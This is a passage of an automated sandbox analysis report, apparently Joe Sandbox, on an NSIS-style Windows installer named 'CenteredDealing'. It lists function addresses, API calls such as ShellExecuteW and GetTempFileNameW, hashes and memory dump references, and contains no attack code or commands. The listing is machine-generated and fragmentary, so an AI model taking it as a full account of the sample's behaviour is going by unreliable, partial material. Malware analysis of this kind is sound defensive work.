                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                        • String ID: 155$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                        • API String ID: 247603264-854506215
                                                                                                                                                                                                                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                                                                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                        • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                                                                                                        Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                        • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                        Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                        Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                        Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                                                                                        Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                                                                                                        Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                        Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                        Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
